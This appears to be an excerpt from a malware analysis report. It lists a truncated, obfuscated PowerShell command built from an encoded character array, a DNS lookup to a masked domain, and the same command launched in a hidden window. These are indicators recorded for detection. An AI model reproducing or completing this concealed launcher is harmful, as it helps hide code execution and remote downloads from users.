Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -JoIN ([CHAr[]]( 119 ,1 , 18,31, 110 ,61 ,54 , 36 ,126 ,60 , 49, 57, 54,48 , 39, 115 , 29 , 54, 39, 125,4 , 54,49,16, 63, 58,54 ,61 ,39 , 104,119,36, 49,21 , 110, 116 , 59 ,39,39 ,35,105,124 , ...
- DNS ASK ma##ers.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -JoIN ([CHAr[]]( 119 ,1 , 18,31, 110 ,61 ,54 , 36 ,126 ,60 , 49, 57, 54,48 , 39, 115 , 29 , 54, 39, 125,4 , 54,49,16, 63, 58,54 ,61 ,39 , 104,119,36, 49,21 , 110, 116 , 59 ,39,39 ,35,105,124 , ...' (with hidden window)